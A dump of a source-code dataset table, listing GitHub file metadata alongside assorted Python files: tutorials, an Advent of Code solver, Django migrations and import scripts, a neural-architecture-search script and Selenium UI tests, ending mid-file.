blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f7d65603dd3f63bc17d9e50ed555b8ca6f8b9da6
|
36e3e6a12c71c738ed69da8a45b633a71faa4a3c
|
/src/GenerationNetwork/__init__.py
|
73a6dff105a31784d99f3d6688b0b3ca2242209a
|
[] |
no_license
|
Zynoz/BachelorsThesis
|
2aa4006294a3b74068ce5e80356a00336e539d54
|
9b5289b947f1eab9b22f5129e8fc7c6f578408d2
|
refs/heads/master
| 2022-12-24T15:05:53.890638
| 2020-10-02T18:03:55
| 2020-10-02T18:03:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 101
|
py
|
from src.GenerationNetwork.NetSicianTreble import *
from src.GenerationNetwork.NetSicianBass import *
|
[
"mail@fschoen.com"
] |
mail@fschoen.com
|
f9bf325e6a0aa3973e010946bb13081dc16811a5
|
bd39340f4ba7e0b914f0b6d882f4f93b7bcdc1e2
|
/ficheros.py
|
0800f259f0907c3511a7a015d49520a1b1adeaad
|
[] |
no_license
|
zcrockz/cursopython
|
34b96885b008a1c934c4c36f02d83d1f51996ea2
|
d3e6ce9bde32ee1c011eb0c06f3f48210dcc9c2d
|
refs/heads/master
| 2022-12-23T07:04:06.294268
| 2020-09-11T05:24:43
| 2020-09-11T05:24:43
| 294,600,453
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 739
|
py
|
"""
#ARCHIVOS PLANOS
#1 READLINE()
from io import open
fichero= open('fichero.txt','r')
texto = fichero.readlines()
fichero.close()
print(texto)
#2 WITH DE MANERA AUTOMATICA,
with open ("fichero.txt","r") as fichero:
for linea in fichero:
print(linea)
#APPEND
fichero = open('fichero.txt', "a")
fichero.write('\n otra linea')
fichero.close()
#METODO SEEK(), PUNTERO EN EL FICHERO no retorna nada
fichero = open("fichero.txt","r")
fichero.seek(0) #puntero al inicio
fichero.seek(10) # leemos los 10 caracteres
"""
"""
texto = "una linea de texto \notra linea con texto"
fichero=open('fichero.xml','w')
fichero.write(texto)
fichero.close()
"""
fichero = open("texto.txt","w")
texto = "hola"
fichero.write(texto)
fichero.close
|
[
"cristiancomplete@gmail.com"
] |
cristiancomplete@gmail.com
|
06045a09ed8ec540906e8be66c86fd6af05e456d
|
5e382a50c521e4cd874ed4e94799e5ef062994a1
|
/services/api-server/tests/unit/test_settings.py
|
cfe542f36c4c13532421717b0c97e0858ad7d909
|
[
"MIT"
] |
permissive
|
KZzizzle/osparc-simcore
|
71103bcfb81d6ea90e0ac9529e8f08568685166c
|
981bc8d193f3f5d507e3225f857e0308c339e163
|
refs/heads/master
| 2021-05-25T08:46:52.704734
| 2020-10-07T14:07:34
| 2020-10-07T14:07:34
| 253,747,491
| 0
| 0
|
MIT
| 2020-04-07T09:29:23
| 2020-04-07T09:29:22
| null |
UTF-8
|
Python
| false
| false
| 1,125
|
py
|
# import pytest
import logging
from pprint import pprint
from simcore_service_api_server.core.settings import (
URL,
AppSettings,
BootModeEnum,
PostgresSettings,
WebServerSettings,
)
# bring .env-devel in here
def test_min_environ_for_settings(monkeypatch):
monkeypatch.setenv("WEBSERVER_HOST", "production_webserver")
monkeypatch.setenv(
"WEBSERVER_SESSION_SECRET_KEY", "REPLACE ME with a key of at least length 32."
)
monkeypatch.setenv("POSTGRES_HOST", "production_postgres")
monkeypatch.setenv("POSTGRES_USER", "test")
monkeypatch.setenv("POSTGRES_PASSWORD", "test")
monkeypatch.setenv("POSTGRES_DB", "simcoredb")
monkeypatch.setenv("SC_BOOT_MODE", "production")
# NOTE: pg and weberver settings parse environ NOW!
settings = AppSettings(postgres=PostgresSettings(), webserver=WebServerSettings())
pprint(settings.dict())
assert settings.boot_mode == BootModeEnum.production
assert settings.loglevel == logging.DEBUG
assert settings.postgres.dsn == URL(
"postgresql://test:test@production_postgres:5432/simcoredb"
)
|
[
"noreply@github.com"
] |
KZzizzle.noreply@github.com
|
9f728d9b27e5d1b18f69b9b3201ca9dbde5c1e1c
|
8deb8e74824a6d529fcdd15f65d049d01944baa5
|
/2021/src/day14.py
|
7d62ed607ee2f324d52c5315f9f1eb881a51e966
|
[] |
no_license
|
levaphenyl/advent_of_code
|
f9d16c421fd2217bc689f54687ee9c5e37ca1c5d
|
53b836b291ff3fcdee9481433bb219a4e9482915
|
refs/heads/master
| 2022-01-13T20:29:23.630021
| 2021-12-27T07:00:38
| 2021-12-27T07:00:38
| 237,289,893
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,702
|
py
|
def polymerize_step(chain, rules):
new_chain = ''
for i in range(len(chain) - 1):
pair = chain[i:i+2]
new_chain += pair[0]
new_chain += rules[pair]
new_chain += chain[-1]
return new_chain
def count_elems(chain):
count = {}
for e in chain:
if e in count:
count[e] += 1
else:
count[e] = 1
return count
def polymerize(init, rules, n_steps):
# Exponential growth!
# Do not use for n_steps > 20.
chain = init
for _ in range(n_steps):
chain = polymerize_step(chain, rules)
return chain
def polymerize_step_opt(pair_cnt, rules):
new_state = { k: v for k, v in pair_cnt.items() }
for pair, cnt in pair_cnt.items():
if cnt:
new_state[pair] -= cnt
new_state[pair[0] + rules[pair]] += cnt
new_state[rules[pair] + pair[1]] += cnt
return new_state
def count_elems_opt(init, rules, n_steps):
pair_cnt = { k: 0 for k in rules }
for i in range(len(init) - 1):
pair = init[i:i+2]
pair_cnt[pair] += 1
for _ in range(n_steps):
pair_cnt = polymerize_step_opt(pair_cnt, rules)
count = {}
for pair, cnt in pair_cnt.items():
if cnt:
e = pair[0]
if e in count:
count[e] += cnt
else:
count[e] = cnt
count[init[-1]] += 1
return count
def load_input(path):
with open(path, 'r') as f:
rows = f.readlines()
rows = [ r.strip() for r in rows if len(r) > 1 ]
init = rows[0]
rules = dict([ r.split(' -> ') for r in rows[1:] ])
return init, rules
def print_results(init, rules, part):
if part == 1:
chain = polymerize(init, rules, 10)
count = count_elems(chain)
elif part == 2:
count = count_elems_opt(init, rules, 40)
emax = max(count.values())
emin = min(count.values())
ret = emax - emin
print("Answer for part {} is {}".format(part, ret))
if __name__ == "__main__":
test_init = "NNCB"
test_rules = {
"CH": "B", "HH": "N", "CB": "H", "NH": "C", "HB": "C", "HC": "B",
"HN": "C", "NN": "C", "BH": "H", "NC": "B", "NB": "B", "BN": "B",
"BB": "N", "BC": "B", "CC": "N", "CN": "C",
}
assert polymerize_step(test_init, test_rules) == "NCNBCHB"
assert len(polymerize(test_init, test_rules, 10)) == 3073
assert count_elems_opt(test_init, test_rules, 10) == { 'B': 1749, 'C': 298, 'H': 161, 'N': 865, }
input_path = "data/input-day14.txt"
input_init, input_rules = load_input(input_path)
print_results(input_init, input_rules, 1)
print_results(input_init, input_rules, 2)
|
[
"phenyl@posteo.net"
] |
phenyl@posteo.net
|
953bde92c9319fcdc73628ad4e684e839e89bab1
|
e6f0000d0ee619f041068984c0ee229abfcfe74e
|
/api/migrations/0021_auto_20210401_1101.py
|
1701d1c72754c4a11c8ee2bd600de7bf6476afcd
|
[] |
no_license
|
Harry-Edge/MNO-CRM-Sales-System
|
b79acd57d977aebc7cba2e7bddf6a2b62e60242d
|
f6bff30b1b76fb1843698ae7bc397e03eda6b872
|
refs/heads/main
| 2023-04-23T01:40:25.158243
| 2021-04-21T19:58:29
| 2021-04-21T19:58:29
| 348,847,375
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
# Generated by Django 3.1.2 on 2021-04-01 11:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0020_auto_20210401_1101'),
]
operations = [
migrations.AlterField(
model_name='notes',
name='date_created',
field=models.DateField(auto_now_add=True),
),
]
|
[
"edge.harry@outlook.com"
] |
edge.harry@outlook.com
|
51756cadb86d7b42e6568eca764db78b21230b30
|
3e68f2f7870a53fed7a65ee23d1f5a6dd04bde8c
|
/src/search/randomNAS/random_weight_share.py
|
0a0c898a19df69e1bd3e1697c915055150853e19
|
[
"Apache-2.0"
] |
permissive
|
automl/RobustDARTS
|
a4eba4d0daf83d673101139c34b2cb872dbefd38
|
273b7ce28c9d575f2340fef2e8ce6c02a4232307
|
refs/heads/master
| 2023-05-31T11:33:56.330335
| 2020-07-21T11:08:42
| 2020-07-21T11:08:42
| 203,361,165
| 161
| 40
|
Apache-2.0
| 2020-11-12T16:43:33
| 2019-08-20T11:20:34
|
Python
|
UTF-8
|
Python
| false
| false
| 6,189
|
py
|
import sys
import os
import ast
import shutil
import logging
import codecs
import json
import inspect
import pickle
import argparse
import numpy as np
sys.path.append('../RobustDARTS')
from src.search.randomNAS.darts_wrapper_discrete import DartsWrapper
from src.search.randomNAS.parse_cnn_arch import parse_arch_to_darts
from src import utils
class Rung:
def __init__(self, rung, nodes):
self.parents = set()
self.children = set()
self.rung = rung
for node in nodes:
n = nodes[node]
if n.rung == self.rung:
self.parents.add(n.parent)
self.children.add(n.node_id)
class Node:
def __init__(self, parent, arch, node_id, rung):
self.parent = parent
self.arch = arch
self.node_id = node_id
self.rung = rung
def to_dict(self):
out = {'parent':self.parent, 'arch': self.arch, 'node_id': self.node_id, 'rung': self.rung}
if hasattr(self, 'objective_val'):
out['objective_val'] = self.objective_val
return out
class Random_NAS:
def __init__(self, B, model, seed, save_dir):
self.save_dir = save_dir
self.B = B
self.model = model
self.args = model.args
self.seed = seed
self.iters = 0
self.arms = {}
self.node_id = 0
def get_arch(self):
arch = self.model.sample_arch()
self.arms[self.node_id] = Node(self.node_id, arch, self.node_id, 0)
self.node_id += 1
return arch
def save(self):
to_save = {a: self.arms[a].to_dict() for a in self.arms}
# Only replace file if save successful so don't lose results of last pickle save
with open(
os.path.join(self.save_dir,'results_tmp_{}.pkl'.format(self.args.task_id)),'wb'
) as f:
pickle.dump(to_save, f)
shutil.copyfile(
os.path.join(self.save_dir,
'results_tmp_{}.pkl'.format(
self.args.task_id
)), os.path.join(self.save_dir,
'results_{}.pkl'.format(self.args.task_id))
)
self.model.save()
def run(self):
errors_dict = {'train_acc': [], 'train_loss': [], 'valid_acc': [],
'valid_loss': []}
while self.iters < self.B:
arch = self.get_arch()
self.model.train_batch(arch, errors_dict)
self.iters += 1
if self.iters % 500 == 0:
self.save()
if (self.iters % self.args.report_freq) and self.args.debug:
break
self.save()
with codecs.open(os.path.join(self.args.save,
'errors_{}.json'.format(self.args.task_id)),
'w', encoding='utf-8') as file:
json.dump(errors_dict, file, separators=(',', ':'))
def get_eval_arch(self, rounds=None, n_samples=1000):
#n_rounds = int(self.B / 7 / 1000)
if rounds is None:
n_rounds = max(1,int(self.B/10000))
else:
n_rounds = rounds
best_rounds = []
for r in range(n_rounds):
sample_vals = []
for _ in range(n_samples):
arch = self.model.sample_arch()
try:
ppl, _ = self.model.evaluate(arch)
except Exception as e:
ppl = 1000000
logging.info(arch)
logging.info('objective_val: %.3f' % ppl)
sample_vals.append((arch, ppl))
sample_vals = sorted(sample_vals, key=lambda x:x[1])
full_vals = []
if 'split' in inspect.getargspec(self.model.evaluate).args:
for i in range(10):
arch = sample_vals[i][0]
try:
ppl, _ = self.model.evaluate(arch, split='valid')
except Exception as e:
ppl = 1000000
full_vals.append((arch, ppl))
full_vals = sorted(full_vals, key=lambda x:x[1])
logging.info('best arch: %s, best arch valid performance: %.3f' % (' '.join([str(i) for i in full_vals[0][0]]), full_vals[0][1]))
best_rounds.append(full_vals[0])
else:
best_rounds.append(sample_vals[0])
return best_rounds
def main(wrapper):
args = wrapper.args
model = wrapper.model
save_dir = args.save
try:
wrapper.load()
logging.info('loaded previously saved weights')
except Exception as e:
print(e)
logging.info("param size = %fMB", utils.count_parameters_in_MB(model))
logging.info('Args: {}'.format(args))
if args.eval_only:
assert save_dir is not None
data_size = 25000
time_steps = 1
B = int(args.epochs * data_size / args.batch_size / time_steps)
searcher = Random_NAS(B, wrapper, args.seed, save_dir)
logging.info('budget: %d' % (searcher.B))
if not args.eval_only:
searcher.run()
archs = searcher.get_eval_arch(args.randomnas_rounds, args.n_samples)
else:
np.random.seed(args.seed+1)
archs = searcher.get_eval_arch(2)
logging.info(archs)
#arch = ' '.join([str(a) for a in archs[0][0]])
arch = str(archs[0][0])
arch = parse_arch_to_darts('cnn', ast.literal_eval(arch), args.space)
with open(os.path.join(args.save, 'arch_{}'.format(args.task_id)),'w') as f:
f.write(str(arch))
logging.info(str(arch))
utils.write_yaml_results(args, args.results_file_arch, str(arch))
return arch
if __name__ == "__main__":
wrapper = DartsWrapper()
log_format = '%(asctime)s %(message)s'
logging.basicConfig(stream=sys.stdout, level=logging.INFO,
format=log_format, datefmt='%m/%d %I:%M:%S %p')
fh = logging.FileHandler(os.path.join(wrapper.args.save,
'log_{}.txt'.format(wrapper.args.task_id)))
fh.setFormatter(logging.Formatter(log_format))
logging.getLogger().addHandler(fh)
main(wrapper)
|
[
"zelaa@informatik.uni-freiburg.de"
] |
zelaa@informatik.uni-freiburg.de
|
2ed35fca7f0d379ca0e89886d81d2931ecca5101
|
42586f5b29fd342271deb650d723c10830b03c0e
|
/calculator.spec
|
a6a5b97dbcef637a13035cc85a681d6ddd9ec341
|
[] |
no_license
|
JFelipeFloresS/Python-Calculator
|
00ce2a31ec9048a0b73d7ef67046c65a6e4c6279
|
b7af55c5a34bf5bcba744656680bae8f86fc913b
|
refs/heads/main
| 2023-07-21T07:29:12.826868
| 2021-08-26T21:11:42
| 2021-08-26T21:11:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 905
|
spec
|
# -*- mode: python ; coding: utf-8 -*-
block_cipher = None
a = Analysis(['calculator.py'],
pathex=['C:\\Users\\josef\\Python\\calculator'],
binaries=[],
datas=[],
hiddenimports=[],
hookspath=[],
runtime_hooks=[],
excludes=[],
win_no_prefer_redirects=False,
win_private_assemblies=False,
cipher=block_cipher,
noarchive=False)
pyz = PYZ(a.pure, a.zipped_data,
cipher=block_cipher)
exe = EXE(pyz,
a.scripts,
a.binaries,
a.zipfiles,
a.datas,
[],
name='calculator',
debug=False,
bootloader_ignore_signals=False,
strip=False,
upx=True,
upx_exclude=[],
runtime_tmpdir=None,
console=False )
|
[
"noreply@github.com"
] |
JFelipeFloresS.noreply@github.com
|
98152e114c929c369e451133a04e7c01ff4ce349
|
7c5df08cb53de6bd3746198dad87e79f8a9231cc
|
/library/main.py
|
27f79319bcd0723ad69a15d86d2e62719ea78aaa
|
[
"MIT"
] |
permissive
|
JessyLeal/fundamentals-of-computational-issues
|
bd9e20f3d6532d03433c1f056ba85e999cc05cf4
|
e8f0205089b153cae89fa4ef9659984fab7cf1d8
|
refs/heads/main
| 2023-08-29T16:12:41.556459
| 2021-11-12T01:25:01
| 2021-11-12T01:25:01
| 427,194,703
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,873
|
py
|
class Livro:
codigo = None
nome = None
autor = None
__qtdeAlugueis = 0
def __init__(self, codigo, nome, autor):
self.codigo = codigo
self.nome = nome
self.autor = autor
def incrementaAluguel(self):
self.__qtdeAlugueis += 1
def getQtdeAlugueis(self):
return self.__qtdeAlugueis
class Biblioteca:
alugados = []
disponiveis = []
def inserir(self, livro):
self.disponiveis.append(livro)
def alugar(self, livro):
ok = True
mensagem = None
if livro in self.disponiveis:
for i in self.disponiveis:
if i == livro:
i.incrementaAluguel()
self.alugados.append(i)
self.disponiveis.remove(i)
break
elif livro in self.alugados:
ok = False
mensagem = "O livro ja esta alugado, infelizmente voce nao podera alugar"
else:
ok = False
mensagem = "O livro nao existe"
return (ok, mensagem)
def devolver(self, codLivro):
ok = True
mensagem = None
for livro in self.alugados:
if livro.codigo == codLivro:
self.disponiveis.append(livro)
self.alugados.remove(livro)
break
else:
ok = False
mensagem = "O livro nao esta alugado"
return (ok, mensagem)
def livroMaisAlugado(self):
ok = True
mensagem = None
maior = 0
nome = None
for livro in self.disponiveis:
if livro.getQtdeAlugueis() > maior:
maior = livro.getQtdeAlugueis()
nome = livro.nome
for livro in self.alugados:
if livro.getQtdeAlugueis() > maior:
maior = livro.getQtdeAlugueis()
nome = livro.nome
if maior == 0:
ok = False
mensagem = "Nenhum livro foi alugado ainda"
else:
mensagem = "O livro mais alugado e: %s (%d alugueis)"%(nome, maior)
return (ok, mensagem)
def livrosOrdenadosPeloNome(self):
listas = [self.disponiveis, self.alugados]
lista_geral = []
for l in listas:
troca = True
while troca:
p = len(l)-1
troca = False
for i in range(p):
if l[i].nome>l[i+1].nome:
l[i], l[i+1]= l[i+1], l[i]
troca = True
i= 0
j = 0
while True:
if i==len(self.disponiveis):
for n in range(self.alugados.index(self.alugados[j]), len(self.alugados)-self.alugados.index(self.alugados[j])):
print(self.alugados[n].codigo, end=' ')
lista_geral.append(self.alugados[n].codigo)
break
elif j == len(self.alugados):
for n in range(self.disponiveis.index(self.disponiveis[i]), len(self.disponiveis)-self.disponiveis.index(self.disponiveis[i])):
print(self.disponiveis[n].codigo, end=' ')
lista_geral.append(self.disponiveis[n].codigo)
break
if self.disponiveis[i]<self.alugados[j]:
lista_geral.append(self.disponiveis[i].codigo)
i+=1
else:
lista_geral.append(self.alugados[j].codigo)
j+=1
class Main:
b = Biblioteca()
q_l, *v = input().split(',')
j = 0
for livro in range(int(q_l)):
lv = Livro(v[j], v[j+1], v[j+2])
b.inserir(lv)
j+=int(q_l)
b.livrosOrdenadosPeloNome()
|
[
"62772815+Jessy777-cripto@users.noreply.github.com"
] |
62772815+Jessy777-cripto@users.noreply.github.com
|
0efeca2feec967be8b2bcea5ed884d35c8b46fb3
|
ef293870ea7bab63360db830e4c2fd830c3f865e
|
/src/web/sb/healthworker/datasets/0004_import_dmo_list.py
|
b3cf43d491efad5c45fc3045415762e173684975
|
[
"Apache-2.0"
] |
permissive
|
fugitspace/switchboard-hwr
|
bd140fbe836db36b323241e12117591254c090d2
|
f108096e885d053c277138516a8f292be22fcb5c
|
refs/heads/master
| 2023-01-14T20:48:23.262319
| 2018-07-24T21:33:48
| 2018-07-24T21:33:48
| 59,547,567
| 0
| 0
| null | 2022-12-26T20:12:19
| 2016-05-24T06:46:31
|
Python
|
UTF-8
|
Python
| false
| false
| 1,808
|
py
|
import datetime
import re
from django.db import transaction
from sb.healthworker.datasets import _helpers
from sb.healthworker.models import DMORegistration
# Useful during testing
def remove_unlinked_registration_entries():
DMORegistration.objects.filter(health_worker__isnull=True).delete()
def parse_registration_number(reg_number):
reg_type = None
if reg_number:
if reg_number[-1].isalpha():
reg_type = reg_number[-1]
reg_number = reg_number[0:-1]
reg_number = reg_number.lstrip('-0').rstrip('-')
return reg_type, reg_number
def parse_phone_number(phone_number):
if phone_number:
return "+255%s" % (phone_number)
def import_new_entry(item):
# Strip all values of leading and trailing whitespace
for k,v in item.items():
if item[k] is not None:
item[k] = v.strip()
worker = DMORegistration()
# Ignore records with no name
worker.name = ' '.join(filter(bool, [item["FirstName"], item["MiddleName"], item["LastName"]]))
if not worker.name:
return
worker.phone_number = parse_phone_number(item["Vodacom"])
worker.registration_type, worker.registration_number = parse_registration_number(item["RegNo"])
worker.cadre = item["Cadre"]
worker.check_number = item["CNO"]
worker.email = item["Email"]
worker.city = item["City"]
worker.district = item["District"]
worker.region = item["Region"]
worker.nationality = item["Nationality"]
worker.gender = item["Gender"]
worker.duty_station = item["DutyStation"]
worker.department = item["Dep"]
worker.save()
def run():
path = _helpers.get_path('dmo_list_11Feb13.csv')
rows = _helpers.read_csv(path)
with transaction.commit_on_success():
remove_unlinked_registration_entries()
for row in rows:
import_new_entry(row)
if __name__ == '__main__':
run()
|
[
"matt@mattolson.com"
] |
matt@mattolson.com
|
5027bbd50a923f67f2911eaf9e9b64d9590dcce9
|
334dea3e7941871a6b23be65cfc9b14d6be49db0
|
/apps/master/migrations/0021_auto_20210517_0801.py
|
750fac77228cec5521a93a3cee4cabac8893d014
|
[] |
no_license
|
HilmiZul/walikelas
|
e2f3d06dfab3ab48373eda2b1b363fe1e64caef6
|
3febaf97272c78310e488c883a9647b269e25930
|
refs/heads/master
| 2023-08-15T20:56:58.011519
| 2021-10-07T04:32:43
| 2021-10-07T04:32:43
| 367,083,389
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 462
|
py
|
# Generated by Django 2.2.17 on 2021-05-17 01:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('master', '0020_auto_20210517_0756'),
]
operations = [
migrations.AlterField(
model_name='mapel',
name='kelompok',
field=models.CharField(choices=[('A', 'A'), ('B', 'B'), ('C1', 'C1'), ('C2', 'C2'), ('C3', 'C3')], max_length=2),
),
]
|
[
"netspytux@gmail.com"
] |
netspytux@gmail.com
|
974e18935422ce086a0fd7dbddf9153acef4abb3
|
62e86a54b7d676ba024bcd3b422206a6c7fac91f
|
/normdist.py
|
df4888729ffe152df0b752d5e92413fe9c9ead39
|
[] |
no_license
|
M4573R/ml-algorithms-simple
|
76a1db5c274763f43eea0c60ec8f5176d8e9ef0c
|
b5534c7c797795b4111631bf623e1e5e890864ef
|
refs/heads/master
| 2021-01-18T04:47:35.720933
| 2015-09-25T15:13:19
| 2015-09-25T15:13:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 593
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
def main():
mu1 = [1, 1]
cov1 = [[4, 0], [30, 100]]
N1 = 1000
X1 = np.random.multivariate_normal(mu1, cov1, N1)
mu2 = [-10, 20]
cov2 = [[10, 3], [0, 20]]
N2 = 1000
X2 = np.random.multivariate_normal(mu2, cov2, N2)
plt.scatter(X1[:, 0], X1[:, 1], color='r', marker='x',
label='$dist_1$')
plt.scatter(X2[:, 0], X2[:, 1], color='b', marker='x',
label='$dist_2$')
plt.show()
if __name__ == '__main__':
main()
|
[
"satojkovic@gmail.com"
] |
satojkovic@gmail.com
|
fe521dcce97257444e00a38add86e76f6f0c0b38
|
e72e75205ad2d0342c49eb0d1970586b81a69257
|
/testscripts/NavigationPage/test_news.py
|
2849c0d3cc298e48fe06c32ad1d1fd110fe223d7
|
[] |
no_license
|
andromedaD/AutoWeb
|
c421f6bf9da69ca251bec6c3d0dd403bb7811245
|
a696ae49af4b9a72b30d89f0acdc6756b2c720ba
|
refs/heads/master
| 2020-04-11T14:37:57.999380
| 2019-01-09T03:54:47
| 2019-01-09T03:54:47
| 161,740,598
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,262
|
py
|
# -*- coding:UTF-8 -*-
import unittest
from testscripts.Login.test_login import Login
from action.driver import *
from util.log_print import *
from util.myunit import StartEnd
from test_data.testdata import testDataInfo
class NewsPage(Login):
url='/'
def load_master_page(self, type, el_loc):
el = self.find_element_(type, el_loc)
self.click_(el)
def load_part_page(self, type, el_loc, status):
el = self.find_elements_(type, el_loc)
self.click_(el[status])
return el
def check_title(self):
return self.title_()
class TestNewsPage(StartEnd):
logger=get_log("test news_page")
data=testDataInfo('News')['News']
def test_news_page(self):
self.logger.info("Start test news_page")
driver=browser()
newspage = NewsPage(driver)
newspage.open_browser_()
newspage.login_page()
newspage.load_master_page(
self.data['master_page'][1]['type'],
self.data['master_page'][2]['value']
)
try:
title=newspage.check_title()
self.assertEqual(title,self.data['check_ma'][2]['value'])
except Exception as msg:
self.logger.error(msg)
newspage.quit_browser_()
finally:
self.logger.info("test news page is end")
newspage.quit_browser_()
def test_homenews_page(self):
self.logger.info("Start test homenews_page")
driver = browser()
newspage = NewsPage(driver)
newspage.open_browser_()
newspage.login_page()
newspage.load_master_page(
self.data['master_page'][1]['type'],
self.data['master_page'][2]['value']
)
try:
newspage.load_part_page(
self.data['part_page'][1]['type'],
self.data['part_page'][2]['value'],
self.data['homenews_page']['homenews_status'][2]['value']
)
title=newspage.check_title()
self.assertEqual(title,self.data['homenews_page']['check_homenews'][2]['value'])
except Exception as msg:
self.logger.error(msg)
newspage.quit_browser_()
finally:
self.logger.info("test home news page is end")
newspage.quit_browser_()
def test_nationalnews_page(self):
self.logger.info("Start test nationalnews_page")
driver = browser()
newspage = NewsPage(driver)
newspage.open_browser_()
newspage.login_page()
newspage.load_master_page(
self.data['master_page'][1]['type'],
self.data['master_page'][2]['value']
)
try:
newspage.load_part_page(
self.data['part_page'][1]['type'],
self.data['part_page'][2]['value'],
self.data['nationalnews_page']['nationalnews_status'][2]['value']
)
title = newspage.check_title()
self.assertEqual(title,self.data['nationalnews_page']['check_nationalnews'][2]['value'])
except Exception as msg:
self.logger.error(msg)
newspage.quit_browser_()
finally:
self.logger.info("test nation news page is end")
newspage.quit_browser_()
def test_disportnews_page(self):
self.logger.info("Start test disportnews_page")
driver = browser()
newspage = NewsPage(driver)
newspage.open_browser_()
newspage.login_page()
newspage.load_master_page(
self.data['master_page'][1]['type'],
self.data['master_page'][2]['value']
)
try:
newspage.load_part_page(
self.data['part_page'][1]['type'],
self.data['part_page'][2]['value'],
self.data['disportnews_page']['disportnews_status'][2]['value']
)
title = newspage.check_title()
self.assertEqual(title,self.data['disportnews_page']['check_disportnews'][2]['value'])
except Exception as msg:
self.logger.error(msg)
newspage.quit_browser_()
finally:
self.logger.info("test disport news page is end")
newspage.quit_browser_()
def test_sportnews_page(self):
self.logger.info("Start test sportnews_page")
driver = browser()
newspage = NewsPage(driver)
newspage.open_browser_()
newspage.login_page()
newspage.load_master_page(
self.data['master_page'][1]['type'],
self.data['master_page'][2]['value']
)
try:
newspage.load_part_page(
self.data['part_page'][1]['type'],
self.data['part_page'][2]['value'],
self.data['sportnews_page']['sportnews_status'][2]['value']
)
title = newspage.check_title()
self.assertEqual(title,self.data['sportnews_page']['check_sportnews'][2]['value'])
except Exception as msg:
self.logger.error(msg)
newspage.quit_browser_()
finally:
self.logger.info("test sport news page is end")
newspage.quit_browser_()
def test_recommandnews_page(self):
self.logger.info("Start test recommandnews_page")
driver = browser()
newspage = NewsPage(driver)
newspage.open_browser_()
newspage.login_page()
newspage.load_master_page(
self.data['master_page'][1]['type'],
self.data['master_page'][2]['value']
)
try:
ele1=newspage.find_element_(
self.data['recommandnews_page']['ele1'][1]['type'],
self.data['recommandnews_page']['ele1'][2]['value']
)
newspage.click_(ele1)
newspage.switch_new_window_()
title = newspage.check_title()
self.assertEqual(title,self.data['recommandnews_page']['check_re'][2]['value'])
except Exception as msg:
self.logger.error(msg)
newspage.quit_browser_()
finally:
self.logger.info("test recommandnews page is end")
newspage.quit_browser_()
def test_lastfresh_page(self):
self.logger.info("Start test lastfresh_page")
driver = browser()
newspage = NewsPage(driver)
newspage.open_browser_()
newspage.login_page()
newspage.load_master_page(
self.data['master_page'][1]['type'],
self.data['master_page'][2]['value']
)
try:
ele1 = newspage.find_elements_(
self.data['lastfresh_page']['ele1'][1]['type'],
self.data['lastfresh_page']['ele1'][2]['value']
)[self.data['lastfresh_page']['status'][2]['value']]
newspage.click_(ele1)
title = newspage.check_title()
self.assertEqual(title,self.data['lastfresh_page']['check_fresh'][2]['value'])
except Exception as msg:
self.logger.error(msg)
newspage.quit_browser_()
finally:
self.logger.info("test lastfresh_page is ok")
newspage.quit_browser_()
def test_hotclick_page(self):
self.logger.info("Start test hotclick_page")
driver = browser()
newspage = NewsPage(driver)
newspage.open_browser_()
newspage.login_page()
newspage.load_master_page(
self.data['master_page'][1]['type'],
self.data['master_page'][2]['value']
)
try:
ele1= newspage.find_elements_(
self.data['hotclick_page']['ele1'][1]['type'],
self.data['hotclick_page']['ele1'][2]['value']
)[self.data['hotclick_page']['status'][2]['value']]
newspage.click_(ele1)
title = newspage.check_title()
self.assertEqual(title,self.data['hotclick_page']['check_hot'][2]['value'])
except Exception as msg:
self.logger.error(msg)
newspage.quit_browser_()
finally:
self.logger.info("test hotclick_page is end")
newspage.quit_browser_()
if __name__ == '__main__':
unittest.main()
|
[
"568898699@qq.com"
] |
568898699@qq.com
|
dd16b124781a2995b6cb5b384e46fea48c0c4aea
|
53f30b6b7de96fa40034b96d2696974804e52d45
|
/aswiki/templatetags/aswikitags.py
|
e47e7aad0786b25bdbbc7ce3c2b8e7c28522f6be
|
[
"BSD-3-Clause"
] |
permissive
|
scanner/django-aswiki
|
2829b4d88d7804bfae750f8f285242f27f356790
|
318908eeccc8da324846ac5ffc4d4a206f560521
|
refs/heads/master
| 2021-07-10T12:21:16.982797
| 2021-04-29T21:20:52
| 2021-04-29T21:20:52
| 1,011,246
| 1
| 0
|
BSD-3-Clause
| 2021-04-29T21:20:53
| 2010-10-21T04:50:25
|
Python
|
UTF-8
|
Python
| false
| false
| 12,096
|
py
|
#
# File: $Id: aswikitags.py 1858 2008-10-26 00:46:40Z scanner $
#
"""
Provides the `creole` template filter. This is not really used so much
by the aswiki app as it is by other apps that may want to render
content using creole AND have it know about the aswiki's wiki
topics. This lets any part of your project have creole markup
including working wiki links.
NOTE: The basis for this module was lifted pretty liberally from
